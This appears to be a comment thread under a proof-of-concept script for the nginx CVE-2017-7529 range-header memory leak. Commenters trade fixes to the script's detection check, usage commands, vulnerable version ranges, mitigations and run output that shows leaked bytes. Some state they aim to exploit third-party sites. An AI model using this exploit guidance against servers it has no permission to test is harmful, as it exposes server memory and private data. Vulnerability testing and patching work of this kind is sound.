Comments (36)
Hi, could you tell me how to use the exploit. Thanks!
from labs.
Hello, I got here while searching for an exploit from a HTB system.
To everyone getting the "Unknown Vulnerable" error - update the code like so, starting at line 32:
httpResponse = send_http_request(url, headers={ 'Range': content_length })
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers:
    log.info("[+] Vulnerable to CVE-2017-7529")
else:
    print("[!] Target not vulnerable: HTTP response code: " + str(httpResponse.status_code))
This way, you can actually see the HTTP response code from the target server. If it's not "206", as the test logic in the exploit expects (if httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers), then the server could already be patched for this vulnerability.
This is probably the case if Nginx is installed from the distribution's package repositories.
I hope that this helps.
~Douglas
from labs.
This Python script does work. The URL needs to be something like http://xxx/yyy/zzz.png, and you should also modify nginx.conf so that the URL can be accessed.
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:
NOT
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers:
We need an image file to do this.
The ngx_http_range_header_filter() checks r->allow_range, which is set when the file acquired is an image.
I compiled nginx 1.14.0 without this patch.
test@ubuntu:~/Desktop$ python cve-2017-7529.py http://127.0.0.1/images/demo.png
INFO:__main__:target: http://127.0.0.1/images/demo.png
INFO:__main__:status: 200: Server: nginx/1.14.0 (Ubuntu)
INFO:__main__:status: 206: Server: nginx/1.14.0 (Ubuntu)
{'Server': 'nginx/1.14.0 (Ubuntu)', 'Last-Modified': 'Tue, 14 May 2019 08:34:34 GMT', 'Connection': 'keep-alive', 'ETag': '"5cda7d9a-eba5"', 'Date': 'Tue, 14 May 2019 09:01:44 GMT', 'Content-Type': 'multipart/byteranges; boundary=00000000000000000002'}
--00000000000000000002
Content-Type: image/png
Content-Range: bytes -623-60324/60325
INFO:__main__:[+] Vulnerable to CVE-2017-7529
from labs.
Still curious why the exploit does not work using a vulnerable nginx-proxy running in a Docker container.
from labs.
I fixed up this exploit and made it into a nice little gist: https://gist.github.com/thehappydinoa/bc3278aea845b4f578362e9363c51115
from labs.
You may want to submit your exploit @ https://www.exploit-db.com/submit/
from labs.
Is there a solution for this? Is it a high-risk issue?
from labs.
In the line
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:
needs to be replaced by
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers:
After that change, I'm still getting:
INFO:main:status: 200: Server: nginx/1.10.3
INFO:main:[?] Unknown Vulnerable
Any idea?
from labs.
It appears that nginx/1.12.1 isn't vulnerable, but it is in the range 0.5.6 - 1.13.2. Can someone verify this please?
from labs.
Copy the code and paste it into Notepad on Windows, or whatever OS you're using, and run it using the following command:
python "text file name".py "URL you want to exploit"
e.g.: python3 test.py http://www."URL".com
from labs.
Hmm, just tried the following:
docker run -d -p 80:80 -v /var/run/docker.sock:/tmp/docker.sock:ro jwilder/nginx-proxy:0.6.0
docker run -d --expose 80 -e VIRTUAL_HOST=foo.bar.com tutum/hello-world
On the host, I added 127.0.0.1 foo.bar.com to /etc/hosts to get foo.bar.com resolved.
curl -L foo.bar.com
outputs "Hello World", so the nginx-proxy is working.
python CVE-2017-7529.py http://foo.bar.com/etc/fstab
outputs
INFO:__main__:target: http://foo.bar.com/etc/fstab
INFO:__main__:status: 200: Server: nginx/1.11.10
INFO:__main__:status: 200: Server: nginx/1.11.10
INFO:__main__:[?] Unknown Vulnerable
According to the Dockerfile and to the proxy replies, the nginx version is 1.11.10, so the bug should apply, right?
from labs.
Thanks @siochs. I will try to review it.
from labs.
I found an article about this issue and it looks like there is a patch for it.
Let's wait for the new release with this patch code.
Thank you.
https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-7529.html
The following configuration can be used as a temporary workaround:
max_ranges 1;
http://nginx.org/download/patch.2017.ranges.txt
from labs.
https://access.redhat.com/security/cve/cve-2017-7529 FYI.
from labs.
@siochs Change this;
"Content-Range" in httpResponse.text
to this
"Content-Range" in httpResponse.headers
from labs.
This still does not seem to work and I get the same error as @siochs. Any further suggestions?
from labs.
It didn't work for me as well.
from labs.
Didn't work for me as well..
Same output for me also:
NFO:main:target: http://www.examlpe.com
INFO:main:status: 200: Server: nginx/1.11.10
INFO:main:status: 200: Server: nginx/1.11.10
INFO:main:[?] Unknown Vulnerable
from labs.
What version of Python are you all using? Sometimes, if the version isn't correct, Python gives errors.
from labs.
I get the same error as @siochs. Any idea how to resolve it?
from labs.
INFO:main:[?] Unknown Vulnerable
from labs.
Same error here too:
INFO:main:status: 200: Server: nginx
INFO:main:status: 200: Server: nginx
INFO:main:[?] Unknown Vulnerable
from labs.
Same error here too:
INFO:main:target: https://url.com
INFO:main:status: 200: Server: nginx/1.12.1
INFO:main:status: 200: Server: nginx/1.12.1
INFO:main:[?] Unknown Vulnerable
from labs.
Same error here too:
INFO:requests.packages.urllib3.connectionpool:Starting new HTTPS connection (1): site.com
INFO:__main__:status: 416: Server: nginx/1.10.3 (Ubuntu)
INFO:__main__:[?] Unknown Vulnerable
Any idea?
from labs.
Not vulnerable: 1.13.3+, 1.12.1+
Vulnerable: 0.5.6-1.13.2
from labs.
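The version ranges quoted just above, and snorez's earlier point that a multipart/byteranges reply carries Content-Range in the body rather than the headers, can be combined into one small checker. This is an added example, not code from the PoC, the gist or anyone in this thread; the sample headers and body are constructed from the output snorez pasted, and the function names are mine.

```python
import re

# Version ranges quoted in the thread: 0.5.6-1.13.2 vulnerable, 1.12.1+ on the
# stable branch and 1.13.3+ fixed. Distro packages may backport the patch (as
# Douglas noted), so a version match is only a hint, never proof.
VULN_LOW, VULN_HIGH = (0, 5, 6), (1, 13, 2)

# Constructed sample, reduced from the multipart/byteranges reply snorez pasted
# above: the boundary, one part's header block, and a placeholder part body.
SAMPLE_HEADERS = {"Server": "nginx/1.14.0 (Ubuntu)",
                  "Content-Type": "multipart/byteranges; boundary=00000000000000000002"}
SAMPLE_BODY = ("--00000000000000000002\r\nContent-Type: image/png\r\n"
               "Content-Range: bytes -623-60324/60325\r\n\r\n<png bytes omitted>\r\n"
               "--00000000000000000002--\r\n")

CONTENT_RANGE = re.compile(r"Content-Range:\s*bytes\s+(-?\d+)-(\d+)/(\d+)")


def parse_version(server_header):
    """'nginx/1.11.10 (Ubuntu)' -> (1, 11, 10); None when the header hides it."""
    m = re.match(r"nginx/(\d+)\.(\d+)\.(\d+)", server_header or "")
    return tuple(int(x) for x in m.groups()) if m else None


def version_in_vulnerable_range(version):
    """True/False from the ranges above, None when the version is unknown."""
    if version is None:
        return None
    if version >= (1, 13, 3) or (1, 12, 1) <= version < (1, 13, 0):
        return False
    return VULN_LOW <= version <= VULN_HIGH


def classify_range_response(status, headers, body):
    """Label a reply to a Range request using the thread's observations: a single
    range puts Content-Range in the headers, a multipart reply puts it in each body
    part, and a negative first-byte-pos in a part is what snorez's output shows."""
    if status == 416:
        return "refused"        # range rejected, e.g. with max_ranges 1 set
    if status == 200:
        return "ignored"        # Range not honoured (non-image URL, proxy, ...)
    if status != 206:
        return "unknown"
    if any(k.lower() == "content-range" for k in headers):
        return "single-range"   # normal single-range reply, nothing unusual
    starts = [int(s) for s, _, _ in CONTENT_RANGE.findall(body)]
    if any(s < 0 for s in starts):
        return "leak"           # bytes from before the file were returned
    return "multipart" if starts else "unknown"
```

Run it against your own servers' replies: a "leak" label combined with a version inside the range is the case to patch, while "refused" is what the max_ranges 1 workaround produces.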
Change "Content-Range" in httpResponse.text to "Content-Range" in httpResponse.headers
from labs.
I got httpResponse.status_code == 200
Is that OK?
from labs.
The same error.
INFO:__main__:target: (http://www.****.com)
INFO:__main__:status: 200: Server: nginx/1.8.0
INFO:__main__:status: 200: Server: nginx/1.8.0
INFO:__main__:[?] Unknown Vulnerable
from labs.
Hey, I find nginx/1.13.9, CVE???
from labs.
In the line
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:
needs to be replaced by
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers:
from labs.
Hello, we've updated our Nginx to the new version 1.15.9 but are still getting the "Vulnerable to CVE-2017-7529" message. Why is it still showing that message instead of "Unknown Vulnerable" after we updated to the latest version? Can anyone give any input? Thanks!
INFO:main:status: 200: Server:
INFO:main:status: 206: Server:
INFO:main:[+] Vulnerable to CVE-2017-7529
from labs.
Can anyone tell me what this response means?
I want to exploit this vuln.
INFO:main:status: 200: Server: nginx/1.10.3
INFO:main:status: 200: Server: nginx/1.10.3
INFO:main:[?] Unknown Vulnerable
from labs.
I fixed up this exploit and made it into a nice little gist: https://gist.github.com/thehappydinoa/bc3278aea845b4f578362e9363c51115
The gist ignores snorez's advice to look for Content-Range in the response text as opposed to the headers.
from labs.
This Python script does work. The URL needs to be something like http://xxx/yyy/zzz.png, and you should also modify nginx.conf so that the URL can be accessed.
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text:
NOT
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.headers:
We need an image file to do this.
The ngx_http_range_header_filter() checks r->allow_range, which is set when the file acquired is an image. I compiled nginx 1.14.0 without this patch.
test@ubuntu:~/Desktop$ python cve-2017-7529.py http://127.0.0.1/images/demo.png
INFO:__main__:target: http://127.0.0.1/images/demo.png
INFO:__main__:status: 200: Server: nginx/1.14.0 (Ubuntu)
INFO:__main__:status: 206: Server: nginx/1.14.0 (Ubuntu)
{'Server': 'nginx/1.14.0 (Ubuntu)', 'Last-Modified': 'Tue, 14 May 2019 08:34:34 GMT', 'Connection': 'keep-alive', 'ETag': '"5cda7d9a-eba5"', 'Date': 'Tue, 14 May 2019 09:01:44 GMT', 'Content-Type': 'multipart/byteranges; boundary=00000000000000000002'}
--00000000000000000002
Content-Type: image/png
Content-Range: bytes -623-60324/60325
INFO:__main__:[+] Vulnerable to CVE-2017-7529
@snorez Will HTTPS not work for reproducing this exploit?
from labs.
Hmm? Interesting... the exploit is not working with a vulnerable server.
from labs.